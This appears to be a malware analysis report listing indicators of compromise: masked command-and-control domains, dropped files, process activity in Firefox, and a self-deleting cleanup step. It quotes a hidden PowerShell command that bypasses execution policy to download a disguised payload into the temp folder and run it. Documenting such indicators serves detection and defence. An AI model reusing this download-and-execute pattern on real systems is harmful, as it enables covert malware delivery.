Technical Information
- http://cr##trt.com/i7/bin.jpg as %temp+%\taske.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/bin.jpg',$env:Temp+'\taske.exe');(New-Object -com Shell.Applic...
- %WINDIR%\explorer.exe
- firefox.exe process, nss3.dll module
- %TEMP%\taske.exe
- %TEMP%\taske.exe
- http://cr##trt.com/i7/bin.jpg
- DNS ASK cr##trt.com
- DNS ASK ai##m.info
- DNS ASK ky###ebird.com
- DNS ASK 0l###otake.men
- '%TEMP%\taske.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/bin.jpg',$env:Temp+'\taske.exe');(New-Object -com Shell.Applic...' (with hidden window)
- '%WINDIR%\syswow64\napstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\taske.exe"
- '%ProgramFiles(x86)%\mozilla firefox\firefox.exe'